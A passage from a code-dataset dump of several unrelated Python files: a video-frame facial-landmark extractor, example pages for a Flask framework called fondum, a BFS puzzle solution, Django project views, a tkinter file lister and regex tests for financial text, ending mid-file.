= [FLAGS.dir_to_process+\"/\" ]\n\ndef resize( path ):\n items = os.listdir( path )\n\n for filename in items:\n\n if (filename.endswith(ext)): #or .avi, .mpeg, whatever. 
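            # descriptive note: fps=fps=1 below tells ffmpeg's fps filter to emit one frame per second of video, written out as numbered JPEGs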
\n\n            #single image only for testing \"-vframes 50\"\n\n            NewDir = \"../__data/__images/\"+filename\n            os.mkdir(NewDir)\n\n            os.system(\"ffmpeg -i {0} -f image2 -vf fps=fps=1 {1}\".format( os.path.join( path+filename, filename ), os.path.join(NewDir, filename+\"%d.jpeg\")))\n\n            items1 = os.listdir(NewDir+\"/\")\n            # toint was undefined; a minimal stand-in assuming frames are named %d.jpeg after the video name\n            toint = lambda s: int(s[len(filename):] or 0)\n            items1 = sorted(items1,key=lambda x: toint(os.path.splitext(x)[0]))\n\n            with open(os.path.join( FLAGS.out_to_csv_file+\"/__out\", filename+\"_dir.csv\"), 'wb' ) as file:\n            # with open(os.path.join( FLAGS.out_to_csv_file+\"/__out_1\", filename+\"_dir.csv\"), 'wb' ) as file:\n\n                for item in items1:\n\n                    if item == '.DS_Store':\n                        continue\n\n                    if (item.endswith('.jpeg')):\n\n                        # load the input image, resize it, and convert it to grayscale\n                        images = cv2.imread(NewDir+\"/\"+item)\n                        # images = cv2.imread( os.path.join( path, \"images\", item ) )\n\n                        try:\n                            preds = fa.get_landmarks(images)[-1]\n                        except:\n                            # print(\"No faces were detected...!\")\n                            continue\n\n                        #TODO: Make this nice\n                        fig = plt.figure(figsize=plt.figaspect(.5))\n                        ax = fig.add_subplot(1, 2, 1)\n                        # ax.imshow(input)\n                        ax.plot(preds[0:17,0],preds[0:17,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n                        ax.plot(preds[17:22,0],preds[17:22,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n                        ax.plot(preds[22:27,0],preds[22:27,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n                        ax.plot(preds[27:31,0],preds[27:31,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n                        ax.plot(preds[31:36,0],preds[31:36,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n                        ax.plot(preds[36:42,0],preds[36:42,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n                        ax.plot(preds[42:48,0],preds[42:48,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n                        ax.plot(preds[48:60,0],preds[48:60,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n                        ax.plot(preds[60:68,0],preds[60:68,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n                        ax.axis('off')\n\n                        ax = fig.add_subplot(1, 2, 2, projection='3d')\n                        surf = ax.scatter(preds[:,0]*1.2,preds[:,1],preds[:,2],c=\"cyan\", alpha=1.0, edgecolor='b')\n                        ax.plot3D(preds[:17,0]*1.2,preds[:17,1], preds[:17,2], color='blue' )\n                        ax.plot3D(preds[17:22,0]*1.2,preds[17:22,1], preds[17:22,2],color='blue')\n                        ax.plot3D(preds[22:27,0]*1.2,preds[22:27,1],preds[22:27,2], color='blue')\n                        ax.plot3D(preds[27:31,0]*1.2,preds[27:31,1],preds[27:31,2], color='blue')\n                        ax.plot3D(preds[31:36,0]*1.2,preds[31:36,1],preds[31:36,2], color='blue')\n                        ax.plot3D(preds[36:42,0]*1.2,preds[36:42,1],preds[36:42,2], color='blue')\n                        ax.plot3D(preds[42:48,0]*1.2,preds[42:48,1],preds[42:48,2], color='blue')\n                        ax.plot3D(preds[48:,0]*1.2,preds[48:,1], preds[48:,2],color='blue' )\n\n                        ax.view_init(elev=90., azim=90.)\n                        ax.set_xlim(ax.get_xlim()[::-1])\n\n                        # remove the extracted frame once it has been processed\n                        os.remove(NewDir+\"/\"+item)\n\n                        line = \"\\\"\"+item+\"~\" + str(0)+ \"\\\";\"\n\n                        for i in range(0, len(preds)):\n\n                            # determine the facial landmarks for the face region, then\n                            # convert the facial landmark (x, y, z)-coordinates to a NumPy\n                            # array\n\n                            line = line + \";\\\"\"+str(preds[i][0])+\"~\"+str(preds[i][1])+\"~\"+str(preds[i][2])+\"\\\"\"\n                        file.write(line.encode())\n                        file.write('\\n'.encode())\n        else:\n\n            for root, dirs, files in os.walk(path+filename, topdown=False):\n\n                for name in files:\n\n                    if (name.endswith(ext)): #or .avi, .mpeg, whatever.\n\n                        NewDir = \"../__data/__images_1/\"+name\n                        if not os.path.exists(NewDir):\n                            os.mkdir(NewDir)\n                            os.system(\"ffmpeg -i {0} -f image2 -vf fps=fps=10 {1}\".format(
os.path.join( path+filename, name ), os.path.join(NewDir, name+\"%d.jpeg\"))) \n else:\n continue\n\n #os.system(\"ffmpeg -i {0} -f image2 -vf fps=fps=1 {1}\".format( os.path.join( path+filename, name ), os.path.join(NewDir, name+\"%d.jpeg\"))) \n \n items1 = os.listdir(NewDir+\"/\")\n\n #hiren changed this on 19-06-2019\n #with open(os.path.join( FLAGS.out_to_csv_file+\"/__out\", name+\"_dir.csv\"), 'wb' ) as file:\n with open(os.path.join( FLAGS.out_to_csv_file+\"/\", name+\"_dir.csv\"), 'wb' ) as file:\n\n for item in items1:\n\n if item == '.DS_Store':\n continue\n\n if (item.endswith('.jpeg')):\n\n # load the input image, resize it, and convert it to grayscale\n images = cv2.imread(NewDir+\"/\"+item)\n\n # f, e, = os.path.splitext(root+\"/\"+item)\n\n try:\n # print( \"img \" + item )\n preds = fa.get_landmarks(images);\n # print( len(preds) );\n # print(preds)\n\n for ( i, Prd ) in enumerate( preds ):\n\n #TODO: Make this nice\n fig = plt.figure(figsize=plt.figaspect(.5))\n ax = fig.add_subplot(1, 2, 1)\n # ax.imshow(input)\n ax.plot(Prd[0:17,0],Prd[0:17,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n ax.plot(Prd[17:22,0],Prd[17:22,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n ax.plot(Prd[22:27,0],Prd[22:27,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n ax.plot(Prd[27:31,0],Prd[27:31,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n ax.plot(Prd[31:36,0],Prd[31:36,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n ax.plot(Prd[36:42,0],Prd[36:42,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n ax.plot(Prd[42:48,0],Prd[42:48,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n ax.plot(Prd[48:60,0],Prd[48:60,1],marker='o',markersize=6,linestyle='-',color='w',lw=2)\n ax.plot(Prd[60:68,0],Prd[60:68,1],marker='o',markersize=6,linestyle='-',color='w',lw=2) \n ax.axis('off')\n\n ax = fig.add_subplot(1, 2, 2, projection='3d')\n surf = ax.scatter(Prd[:,0]*1.2,Prd[:,1],Prd[:,2],c=\"cyan\", alpha=1.0, edgecolor='b')\n ax.plot3D(Prd[:17,0]*1.2,Prd[:17,1], Prd[:17,2], color='blue' )\n ax.plot3D(Prd[17:22,0]*1.2,Prd[17:22,1],Prd[17:22,2],color='blue')\n ax.plot3D(Prd[22:27,0]*1.2,Prd[22:27,1],Prd[22:27,2], color='blue')\n ax.plot3D(Prd[27:31,0]*1.2,Prd[27:31,1],Prd[27:31,2], color='blue')\n ax.plot3D(Prd[31:36,0]*1.2,Prd[31:36,1],Prd[31:36,2], color='blue')\n ax.plot3D(Prd[36:42,0]*1.2,Prd[36:42,1],Prd[36:42,2], color='blue')\n ax.plot3D(Prd[42:48,0]*1.2,Prd[42:48,1],Prd[42:48,1], color='blue')\n ax.plot3D(Prd[48:,0]*1.2,Prd[48:,1], Prd[48:,2],color='blue' )\n\n ax.view_init(elev=90., azim=90.)\n ax.set_xlim(ax.get_xlim()[::-1])\n\n # Remove item into dir\n if not FLAGS.is_keep_extracted_image:\n os.remove(NewDir+\"/\"+item)\n\n # for (i,Pre) in enumerate(Prd):\n\n line = \"\\\"\"+item+\"~\" + str(i)+ \"\\\";\"\n\n for i in range(0, len(Prd)):\n\n # determine the facial landmarks for the face region, then\n # convert the facial landmark (x, y, z)-coordinates to a NumPy\n # array\n\n line = line + \";\\\"\"+str(Prd[i][0])+\"~\"+str(Prd[i][1])+\"~\"+str(Prd[i][2])+\"\\\"\"\n file.write(line.encode())\n file.write('\\n'.encode()) \n\n except:\n continue\n else:\n continue \n\n \nfor path in paths:\n resize( path )\n","sub_path":"face-alignment-master/examples/facial_3D_landmarks.py","file_name":"facial_3D_landmarks.py","file_ext":"py","file_size_in_byte":11700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"144194247","text":"from wtforms.validators import InputRequired, 
NumberRange\nfrom app import g\nimport msg\nfrom page import Page, PageForm, PageTable, \\\n DisplayPictureField, DisplayTextField, ButtonUrlField, \\\n BooleanField, DateField, DateTimeField, DecimalField, FileField, \\\n FloatField, IntegerField, RadioField, SelectField, \\\n SelectMultipleField, SubmitField, StringField, \\\n HiddenField, PasswordField, TextAreaField\nfrom flask import render_template, render_template_string, redirect\nimport datetime\nimport random\nfrom sendmail import sendmail\nimport fondum_utility\n\n\n# /example/about/\nclass About(Page):\n\n default_text = \"\"\"\n==About {{DOMAIN}}\n\"\"\"\n\n\ndef mylookup():\n return [(\"aa\", \"Dynamic A\"), (\"bb\", \"Dynamic B\")]\n\n\n# url will be /example/example-of-everything/\nclass ExampleOfEverything(Page):\n\n default_text = \"\"\"\n== Example of Everything\n\nThis very-crowded page is an example of all the items can be found on a \"Page\" class page.\n\nThey are (in order):\n\n# Page Document (this section)\n** Currently showing //default_text//, but can be overwritten with MongoDB document\n# A Form\n** a.k.a. //MainForm//\n** \"horizontal\" form_style was chosen.\n** a //process_form// function was found in the MainForm, so the \n# A Catalog\n** TBD\n# A Set of Tables\n** Two tables; the first one has randomized data in it.\n\n\n\"\"\"\n\n form_style = \"horizontal\"\n\n class MainForm(PageForm):\n\n b = BooleanField(\"My Boolean\")\n d = DateField(\"My Date\")\n dt = DateTimeField(\"My DateTime\")\n fl = FloatField(\"My Float\")\n i = IntegerField(\"My Integer\")\n r = RadioField(\"My Radio\", choices=[(\"x\", \"X\"), (\"y\", \"Y\")], default=\"y\")\n sf = SelectField(\"My Select\", choices=mylookup)\n sfm = SelectMultipleField(\"My Multiple Select\", choices=[(\"c\", \"C\"), (\"d\", \"D\")])\n s = StringField (\"My String\")\n h = HiddenField(\"My Hidden\")\n p = PasswordField(\"My Password\")\n t = TextAreaField(\"My Text Data\")\n buf = ButtonUrlField(\"My Button Url Field\", href=\"https://google.com\")\n dpf = DisplayPictureField(\n \"My Picture\",\n url=\"https://upload.wikimedia.org/wikipedia/commons/thumb/9/97/The_Earth_seen_from_Apollo_17.jpg/225px-The_Earth_seen_from_Apollo_17.jpg\",\n href=\"https://www.yahoo.com\"\n )\n dtf = DisplayTextField(\"My Displayed Text\", default=\"abcdefg\")\n submit = SubmitField(\"Send It\")\n\n def set_field_values(self, new_page, **kwargs):\n self.dt.data = datetime.datetime.now()\n self.t.data = \"Some starting text!\\n...and some more!\"\n\n def process_form(self, wtf, **kwargs):\n #\n # this is where any database processing would happen\n #\n msg.flash(\"Got it! 
string={}, integer={}, etc.\".format(wtf.s.data, wtf.i.data))\n return msg.success(\"All good.\", return_def=\"page_example_about\")\n\n\n\n\n class MyTableOne(PageTable):\n key_name = \"tab_one\"\n table_name = \"My Table with Random Values\"\n\n class MTRow(PageForm):\n b = BooleanField(\"My Boolean\")\n d = DateField(\"My Date\")\n dt = DateTimeField(\"My DateTime\")\n fl = FloatField(\"My Float\")\n i = IntegerField(\"My Integer\")\n r = RadioField(\"My Radio\", choices=[(\"x\", \"X\"), (\"y\", \"Y\")], default=\"y\")\n sf = SelectField(\"My Select\", choices=[(\"a\", \"A\"), (\"b\", \"B\")])\n sfm = SelectMultipleField(\"My Multiple Select\", choices=[(\"c\", \"C\"), (\"d\", \"D\"), (\"e\", \"E\"), (\"f\", \"F\")])\n s = StringField (\"My String\")\n h = HiddenField(\"My Hidden\")\n p = PasswordField(\"My Password\")\n t = TextAreaField(\"My Text Data\")\n buf = ButtonUrlField(\"My Button Url Field\", href=\"https://google.com\")\n dpf = DisplayPictureField(\n \"My Picture\",\n url=\"https://upload.wikimedia.org/wikipedia/commons/thumb/9/97/The_Earth_seen_from_Apollo_17.jpg/225px-The_Earth_seen_from_Apollo_17.jpg\",\n href=\"https://www.yahoo.com\"\n )\n dtf = DisplayTextField(\"My Displayed Text\", default=\"abcdefg\")\n submit = SubmitField(\"Send It\")\n\n def process_table(self, **kwargs):\n self.set_header(self.MTRow())\n for n in range(1, 5):\n r = self.MTRow()\n r.b.data = random.choice([True, False])\n r.d.data = datetime.datetime.now()\n r.dt.data = datetime.datetime.now()\n r.fl.data = random.random()\n r.i.data = random.randint(-1000, 1000)\n r.r.data = random.choice(r.r.choices)[0]\n r.sf.data = random.choice(r.sf.choices)[0] # it does NOT display 'default'; it displays 'data'\n r.sfm.data = [random.choice(r.sfm.choices)[0], random.choice(r.sfm.choices)[0]]\n # r.sfm.data = [k for k,v in random.choices(r.sfm.choices, k=random.randint(0,len(r.sfm.choices)))]\n r.s.data = random.choice([\"hat\", \"apple\", \"ball\", \"fish\"])\n r.h.data = \"you can't see me.\"\n r.p.data = \"still can't see me.\"\n r.t.data = \"line1\\nline2\\nline3\\n\"\n # r.buf.data = x # it does not matter what 'data' contains\n # r.dpf.data = x\n self.rows.append(r)\n return msg.success(\"random number of rows of things.\")\n\n class MyTableTwo(PageTable):\n key_name = \"tab_two\"\n table_name = \"My Table Two\"\n\n class TabTwoRow(PageForm):\n s_name = StringField(\"Name\")\n s_something = StringField(\"Something\")\n s_none = StringField(\"Nothing\")\n\n def process_table(self, **kwargs):\n self.set_header(self.TabTwoRow())\n for a in [\"a\", \"b\", \"c\"]:\n r = self.TabTwoRow()\n r.s_name.data = a\n r.s_something.data = \"blah\"\n self.rows.append(r)\n return msg.success(\"rows of stuff for table 2.\")\n\n\n table_order = [\n MyTableOne,\n MyTableTwo\n ]\n\n\n\n\n\n\n# /example/special/\nclass Special(Page):\n\n # a \"fondum_bypass\" method, if defined, causes fondum to basically ignore\n # _almost_ everything about Page and use fondum_pypass to render the web page instead.\n #\n # Do NOT use decorators. The route decorator is already handled by fondum compilation.\n # For the decorator requiring login, add/modify the \"login_required\" attribute.\n\n login_required = False\n\n def fondum_bypass(self, **kwargs):\n special_text = \"\"\"\n \n \n

Aha, {{g.display_name}}!\n We are running a hardcore \"view\" of our own!\n\n Fancier:\n
\n \n \n \n \"\"\"\n return render_template_string(special_text, short_list=[\"one\", \"two\"])\n\n\n# /example/special-with-parm/\nclass SpecialWithParm__myparm(Page):\n\n # an example \"fondum bypass\" that has a route paramater (/example/special-with-parm/)\n # this example also uses an html jinja file in the templates directory\n\n login_required = False\n\n def fondum_bypass(self, **kwargs):\n return render_template(\"special-with-parm.html\", kwargs=kwargs)\n\n\n# /example/example-sendmail/\nclass ExampleSendmail(Page):\n\n default_text = \"\"\"\n==== Examples of Extended Features\n== Sendmail\n\nThe example below shows the //sendmail// feature of fondum. By default, this \nextended feature is turned off.\n\nThe example is kind of silly. Generally, one would never allow the general public\nto send emails. It is strictly for demonstraction. In practice, you would use the function\nmore subtley and with greater restrictions.\n\n** Currently uses //sendgrid// commercial service; which includes a free tier.\n\"\"\"\n\n class MainForm(PageForm):\n\n msg_to = DisplayTextField(\"To:\")\n msg_from = StringField(\"From:\")\n msg_subject = StringField(\"Subject:\")\n msg_text = TextAreaField(\"Body (with creole markup):\")\n submit = SubmitField(\"Send An Email\")\n\n def set_field_values(self, new_page, **kwargs):\n self.msg_to.data = \"test@example.com\"\n\n def process_form(self, wtf, **kwargs):\n #\n # this is where any database processing would happen\n #\n result_msg = sendmail(\n 1,\n to_addr=\"test \",\n creole_text=self.msg_text.data, \n subject=self.msg_subject.data, \n from_addr=self.msg_from.data,\n )\n return result_msg\n\n\n# /example/flash\nclass Flash(Page):\n\n default_text = \"\"\"\n== Example of Flash Messaging\n\nUsing the form below, enter a message and category of message and press Submit.\nA copy of that message will then flash on the page after submission.\n\"\"\"\n\n class MainForm(PageForm):\n\n message = StringField(\"Message content\")\n category = SelectField(\"Category\", choices=[\n (\"message\", \"Default/Generic [message]\"),\n (\"success\", \"Success [success]\"),\n (\"info\", \"Informational [info]\"),\n (\"warning\", \"Warning/Caution [warning]\"),\n (\"danger\", \"Danger/Error/Failure [danger]\"),\n ])\n submit = SubmitField(\"Submit\")\n\n def process_form(self, wtf, **kwargs):\n #\n # this is where any database processing would happen\n #\n\n m = msg.message(self.message.data)\n m.set_category(self.category.data)\n return m\n\n\n# NOTE: Normally the following would be stored in the corresponding\n# 'x__models.py' file. So, in this case, it would be stored in\n# 'examples__models.py'. 
But I break the normal rule here to help with\n# documentation of this CopyFields example.\n#\n\nimport mongoengine as db\n\n\nclass TestDocument(db.Document):\n name = db.StringField(label=\"Full Name\", required=True)\n height = db.IntField(required=True)\n age = db.IntField()\n hair_color = db.StringField(\n choices=('black', 'brown', 'blond', 'red', 'grey'),\n )\n handedness = db.StringField(\n label = \"Left/Right Handed\",\n choices=('left', 'right'),\n radio=True\n )\n shirt_color = db.StringField(\n label=\"Shirt Color Assigned\",\n default=\"blue\",\n display_only=True,\n )\n notes = db.StringField(\n textarea=True\n )\n silly = db.StringField(\n label=\"Can't See Me\",\n default=\"blimey\",\n required=True,\n hide=True\n )\n income = db.FloatField(required=True)\n\n#\n# \"extra\" labels supported:\n# label = Field Label\n\n# NOTE: Normally the following would be stored in the corresponding\n# 'x__database.py' file. So, in this case, it would be stored in\n# 'examples__database.py'. But I break the normal rule here to help with\n# documentation of this CopyFields example.\n#\n\nfrom fondum_utility import copy_fields\n\n\ndef create_testDocument(wtf):\n doc = TestDocument()\n copy_fields(src=wtf, dest=doc)\n doc.save()\n return msg.success('Created TestDocument \"{}\"'.format(doc.name))\n\n\ndef read_testDocument(doc_id):\n doc = TestDocument.objects(id=doc_id).first()\n if doc:\n return doc\n return msg.err(\"Unable to locate document\")\n\n\ndef readlist_testDocument_all():\n tdl = TestDocument.objects()\n return tdl\n\n\ndef delete_testDocument(doc_id):\n doc = read_testDocument(doc_id)\n if msg.is_message(doc):\n return doc\n doc.delete()\n return msg.success(\"TestDocument document deleted.\")\n\n\n# /example/copy-fields\nclass CopyFields(Page):\n\n default_text = \"\"\"\n== Example of the Copy Fields Function\n===List Documents\n\n\"Fields\" are importable in both directions.\n* One can import the fields of a MongoEngine Document into a PageForm (child of WTForms) with the '_import_fields=obj' class variable.\n* One can export the fields of PageForms into a MongoEngine Document with the 'fondum_utility.copy_fields(...)' function.\n\nSee the corresponding source code for this page for the example of use.\n\nNOTE: By definition, '_import_fields' skips the 'id' fields or any field starting with an underscore.\n\nNOTE: the library 'Flask-MongoEngine' also has a 'model_form' function that has function similar to '_import_fields'.\n\nThis particular page reads the contents of the 'TestDocument' collection and shows the entries.\n\"\"\"\n\n class TableOne(PageTable):\n key_name = \"main\"\n table_name = \"\" # an empty table name (and only one table) suppresses the tabs\n\n class Row(PageForm):\n _import_fields = TestDocument\n # _field_order is strictly optional; without it, the imports are simply appended\n delete = ButtonUrlField(\"Delete\")\n _field_order = ['name', 'age', 'height', 'hair_color', 'shirt_color', 'notes', \"handedness\", \"silly\", 'income', \"delete\"]\n\n class CreateButtonRow(PageForm):\n create = ButtonUrlField(\"Create\", href=\"/example/copy-fields-new/\")\n\n def process_table(self, **kwargs):\n self.set_header(self.Row())\n tdl = readlist_testDocument_all()\n for doc in tdl:\n r = self.Row()\n fondum_utility.copy_fields(src=doc, dest=r)\n r.delete.href = \"/example/copy-fields-delete/{}/\".format(doc.id)\n self.rows.append(r)\n self.rows.append(self.CreateButtonRow())\n return msg.success(\"all documents\")\n\n table_order = [\n TableOne,\n ]\n\n# 
/example/copy-fields-new\nclass CopyFieldsNew(Page):\n\n default_text = \"\"\"\n== Example of the Copy Fields Function\n=== Create New Record\n\nThis particular page creates a new document in the TestDocument collection.\n\"\"\"\n\n class MainForm(PageForm):\n\n age = IntegerField(\"Current Age\")\n submit = SubmitField(\"Submit\")\n # _import_fields = models.TestDocument\n _import_fields = TestDocument\n\n # _field_order is strictly optional; without it, the imports are simply appended\n _field_order = ['name', 'age', 'height', 'hair_color', 'shirt_color', 'income', 'notes', 'silly', 'handedness', 'submit']\n\n def process_form(self, wtf, **kwargs):\n # return database.create_testDocument()\n response = create_testDocument(wtf)\n if msg.is_good(response):\n response.return_def = \"page_example_copy_fields\"\n return response\n\n def set_field_values(self, new_page, **kwargs):\n if new_page:\n self.age.data = 22\n\n\n# /example/copy-fields-delete/\nclass CopyFieldsDelete__id(Page):\n\n def fondum_bypass(self, **kwargs):\n doc_id = kwargs[\"id\"]\n response = delete_testDocument(doc_id)\n msg.flash(response)\n return redirect(\"/example/copy-fields/\")\n\n# eof\n","sub_path":"fondum/starter_web/custom/example__pages.py","file_name":"example__pages.py","file_ext":"py","file_size_in_byte":15072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"203489539","text":"\ndef work(n, k):\n map = [0] * 200000\n step = 0\n s = set()\n s.add(n)\n map[n] = 1\n while map[k] == 0:\n step += 1\n now = set()\n for x in s:\n if x+1 <= 100000 and map[x + 1] == 0:\n now.add(x + 1)\n map[x + 1] = 1\n if x-1 >= 0 and map[x - 1] == 0:\n now.add(x - 1)\n map[x - 1] = 1\n if x*2 <= 100000 and map[x * 2] == 0:\n now.add(x * 2)\n map[x * 2] = 1\n s = now\n return step\n\n\n# -- author: lijw --\nif __name__ == '__main__':\n n, k = input().split(' ')\n n = int(n)\n k = int(k)\n print(work(n, k))\n","sub_path":"225. 
Catch That Cow/225.py","file_name":"225.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"504724055","text":"import json\nfrom django.db import connection\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse\nfrom django.core import serializers\nfrom django.shortcuts import render,redirect,HttpResponse\nfrom .models import Projects,Work,WorkType,Customers,Employee\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nimport datetime\n\ndef dictfetchall(cursor):\n \"Return all rows from a cursor as a dict\"\n columns = [col[0] for col in cursor.description]\n return [\n dict(zip(columns, row))\n for row in cursor.fetchall()\n ]\n\ndef Sproject():\n cursor = connection.cursor()\n cursor.execute('select p.id, p.name as pname, p.address, p.start, p.end, p.pcode, p.contract_value, '\n +' pt.name as ptname, pt.id as ptid, c.id as cid, c.fname'\n +' from projects_projects p, projects_projecttype pt, projects_customers c'\n +' where pt.id = p.projtype_id'\n +' and p.customer_id = c.id order by p.id ')\n row = dictfetchall(cursor)\n return row\n \ndef genProjectCode():\n now = datetime.datetime.now()\n try:\n i= Projects.objects.all().order_by(\"-id\")[0]\n print(i.id)\n i = i.id+1\n code = (\"P-\"+ now.strftime(\"%d%m%y\") + \"\" + str('{:05d}'.format(i)))\n print(code)\n except:\n code = (\"P-\"+ now.strftime(\"%d%m%y\") + \"\" + \"00001\")\n print(code)\n return code\n\ndef Scustomer():\n cursor = connection.cursor()\n cursor.execute('select * from projects_customers ')\n row = dictfetchall(cursor)\n return row\n\ndef SprojectType():\n cursor = connection.cursor()\n cursor.execute('select * from projects_projecttype order by active desc,id')\n row = dictfetchall(cursor)\n return row\n\n@csrf_exempt\ndef findProject(request):\n data = Sproject()\n dataProjType = SprojectType()\n code = genProjectCode()\n dataCust = Scustomer()\n context = {'data':data,'dataCust':dataCust,'dataProjType':dataProjType,'code':code}\n return JsonResponse(context)\n\ndef ProjectList(request):\n return render(request, 'projects/index.html')\n \ndef AddProject(request):\n if request.method == 'POST':\n project_code = request.POST.get('code')\n project_name = request.POST.get('pname')\n project_type = request.POST.get('projType')\n project_contract_val = request.POST.get('contractval')\n project_address = request.POST.get('address')\n project_cust = request.POST.get('cust')\n project_start = request.POST.get('start')\n project_end = request.POST.get('end')\n users = request.user.id\n hAction = request.POST.get('hAction')\n response_data = {}\n\n if hAction == 'new':\n projects = Projects(\n pcode = project_code,\n name = project_name,\n projtype_id=project_type,\n Contract_value = project_contract_val,\n address = project_address,\n customer_id = project_cust,\n start = project_start,\n end=project_end,\n user_id = users\n )\n projects.save()\n\n response_data['result'] = 'Create work successful!'\n\n return HttpResponse(\n json.dumps(response_data),\n content_type=\"application/json\"\n )\n \n elif hAction == 'update':\n project_id = Projects.objects.get(pcode=project_code)\n print(project_id.pk)\n projects = Projects(\n pk= project_id.pk,\n pcode = project_code,\n name=project_name,\n Contract_value = project_contract_val,\n projtype_id = project_type,\n address = project_address,\n customer_id = project_cust,\n start = 
project_start,\n end = project_end\n )\n projects.save()\n response_data['result'] = 'Update work successful!'\n\n return HttpResponse(\n json.dumps(response_data),\n content_type=\"application/json\"\n )\n\n elif hAction == 'delete':\n project_id = Projects.objects.get(name=project_name)\n print(project_id.pk)\n projects = Projects(\n pk=project_id.pk,\n pcode = project_code,\n name=project_name,\n Contract_value = project_contract_val,\n projtype_id = project_type,\n address = project_address,\n customer_id = project_cust,\n start = project_start,\n end=project_end\n )\n projects.delete()\n response_data['result'] = 'delete work successful!'\n\n return HttpResponse(json.dumps(response_data),content_type=\"application/json\" )\n else:\n response_data['result'] = 'Nothing'\n return HttpResponse(json.dumps(response_data), content_type=\"application/json\" )\n","sub_path":"construction/projects/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"107102444","text":"from tkinter import *\nimport os\nclass testapp(Tk):\n def __init__(self,parent):\n Tk.__init__(self,parent)\n self.parent=parent\n self.initialize()\n def initialize(self):\n # It's usually best to have the portion of code which creates all the GUI elements (button, text fields...) separate from the logic of the program.\n # That's why we create the initialize() method. We will create all our widgets (buttons, text field, etc.) in this method\n self.grid()#container to hold all the controls\n #textbox for inputing data\n self.entry=Entry(self)\n self.entry.grid(column=0,row=0,sticky='EW')\n self.entry.bind(\"\",self.OnPressEnter)\n #Button\n self.button=Button(self,text=\"open\",command=self.OnButtonClick)\n self.button.grid(column=1,row=0)\n label=Label(self,anchor=\"w\",fg=\"white\",bg=\"blue\")\n label.grid(column=0,row=1,columnspan=2,sticky=\"EW\")\n #list of invalid response\n self.listbox=Listbox(self,width=\"100\")\n self.listbox.grid(column=0,row=2,columnspan=2,sticky=\"EW\")\n\n #load data\n consumer_response_files_path_new=\"C:\\\\Users\\\\fengmingy\\\\Desktop\\\\CBA_Test\\\\CBA_Con_Expected_Resp_New\"\n for f in os.listdir(consumer_response_files_path_new):\n self.listbox.insert(END, os.path.join(consumer_response_files_path_new,f))\n\n #view invalid response button\n view=Button(self,text=\"View File\",command=self.OnButtonClick)\n view.grid(column=2,row=2)\n\n #reload_buttion\n reload_btn=Button(self,text=\"Reload\")\n view.grid(column=2,row=2)\n label=Label(self,anchor=\"w\",fg=\"white\",bg=\"blue\")\n label.grid(column=0,row=1,columnspan=2,sticky=\"EW\")\n self.grid_columnconfigure(0,weight=1)\n\n\n def OnButtonClick(self):\n index=self.listbox.curselection()[0]\n selected_text=self.listbox.get(index)\n print(selected_text)\n print ( 'you clicked me')\n def OnPressEnter(self,event):\n print (' you pressed enter')\n\n# Now we have a class, let's use it !\n# We create a main which is executed when the program is run from the command-line.\nif __name__==\"__main__\":\n app=testapp(None)\n app.title(\"Test Automation\")\n # It means that each program will now loop indefinitely, waiting for events (user clicking a button, pressing keys, operating system asking our application to quit, etc.).\n # window will display\n 
app.mainloop()\n","sub_path":"test_automation_webservices/test/helloworld.py","file_name":"helloworld.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"449032681","text":"\"\"\"Module containing test functions for Income Account/Statement zones.\"\"\"\n\nfrom re import finditer\nimport numpy as np\nimport pandas as pd\nimport re\n\ndef test_caps_income_account(value):\n \"\"\"Search zone content for 'INCOME ACCOUNT' string.\"\"\"\n\n def caps_ratio(value):\n \"\"\"Define ratio of capital characters.\"\"\"\n\n cap_count = 0\n for char in value.replace(' ', ''):\n if char.isupper():\n cap_count += 1\n\n caps_ratio = cap_count / len(value.replace(' ', ''))\n return caps_ratio\n\n test_string = r'.*[Iil][Nnm][CcOo0Ee]{2}.{1,4}[Aa][CcOoEe0]{3}[Uu].*'\n print_test = r'[Iil][Nnm][CcOo0Ee]{2}.{1,4}[Aa][CcOoEe0]{3}[Uu].{1,3}'\n\n if re.match(test_string, value):\n value_out = 0\n\n for match in finditer(print_test, value):\n if caps_ratio(match.group()) > .2:\n # print(match.span(), match.group())\n value_out = 1\n else:\n value_out = 0\n\n return value_out\n\ndef test_income_account(value):\n \"\"\"Search zone content for 'Income Account' string.\"\"\"\n\n test_string_account = r'.*[Iil][nm][coe0]{2}.{1,4}[Aa][coe0]{3}[u].*'\n print_test_account = r'[Iil][nm][coe0]{2}.{1,4}[Aa][coe0]{3}[u].{1,3}'\n\n if re.match(test_string_account, value):\n value_out = 0\n\n test_string_year = r'.*[Yy][er][as].{1,10}[Eet][no]d*.*'\n test_string_month = r'.*[Mm][o][n\\.].{1,9}[\\s][Eet][no]d*.*'\n test_string_period = r'.*[Pp][eo]ri.{1,30}[Eet]*[no]*d*.*'\n test_string_to = r'.*\\d{3,4}.{1,3}to.*'\n\n print_test_year = r'[Yy][er][as].{1,10}[Eet\\&][no]d*'\n print_test_month = r'[Mm][o][n\\.].{1,9}[\\s][Eet\\&][no]d*'\n print_test_period = r'[Pp][eo]ri.{1,30}[Eet\\&]*[no]*d*'\n print_test_to = 